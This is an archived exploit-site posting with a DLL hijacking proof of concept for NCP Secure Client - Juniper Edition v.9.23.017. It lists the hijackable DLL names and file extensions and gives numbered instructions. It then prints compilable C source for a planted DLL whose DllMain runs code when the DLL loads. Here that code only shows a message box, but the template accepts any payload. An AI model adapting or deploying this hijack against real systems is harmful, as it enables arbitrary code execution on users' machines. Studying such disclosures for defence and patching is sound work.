Home / os / win7

NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking

Posted on 14 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================
NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking Exploit
====================================================================

/*
Exploit Title: NCP Secure Client - Juniper Edition v.9.23.017 DLL Hijacking Exploit (dvccsabase002.dll, conman.dll, kmpapi32.dll)
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Software Version: NCP Secure Client - Juniper Edition v.9.23.017
Vendor Site: http://www.ncp-e.com/
Download URL: http://www.ncp-e.com/en/downloadstatistik/secure-entry-client/ncp-secure-client-juniper-edition.html
Vulnerable Extensions: pcf, spd, wge, wgx
Tested Under: winxp_sp3.080413-2111

Instructions: 
1. Compile the following code
2. Create a file of the affected extensions in the same directory as the dll
3. Execute file.&lt;extension&gt;
*/

#include &lt;windows.h&gt;
#define DLLIMPORT __declspec (dllexport)

int m0nk()
{
	MessageBox(0, &quot;NCP Secure Client - Juniper Edition v.9.23.017 is vulnerable to DLL Hijacking&quot;, &quot;secuid0&quot;, MB_OK);
	return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD m0nk_call,LPVOID lpReserved)
{
	switch (m0nk_call)
	{
	case DLL_PROCESS_ATTACH:
		m0nk();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :